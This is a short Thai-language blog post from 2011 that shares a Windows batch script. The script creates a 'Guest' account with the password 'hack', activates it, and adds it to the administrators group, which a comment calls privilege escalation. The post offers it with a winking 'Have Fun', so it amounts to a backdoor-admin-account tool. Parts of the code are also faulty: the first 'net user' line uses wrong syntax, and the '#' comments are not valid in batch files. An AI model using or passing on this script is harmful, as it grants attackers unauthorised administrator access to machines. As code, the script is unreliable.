หน้าเว็บ

วันเสาร์ที่ 6 สิงหาคม พ.ศ. 2554

Add User , Enabled User [ Batch ]


@echo off
net user add Guest hack /add  # เพิ่ม User : Guest , Password : hack 
net user Guest hack /active:yes # Enabled User Guest 
net localgroup administrators Guest /add # เพิ่ม Guest ให้อยู่ในกลุ่มของ Admin (ยกระดับสิทธิ์) 
pause

คงไม่ต้องบอกนะครับว่าใช้อย่างไร Have Fun ~

ไม่มีความคิดเห็น:

แสดงความคิดเห็น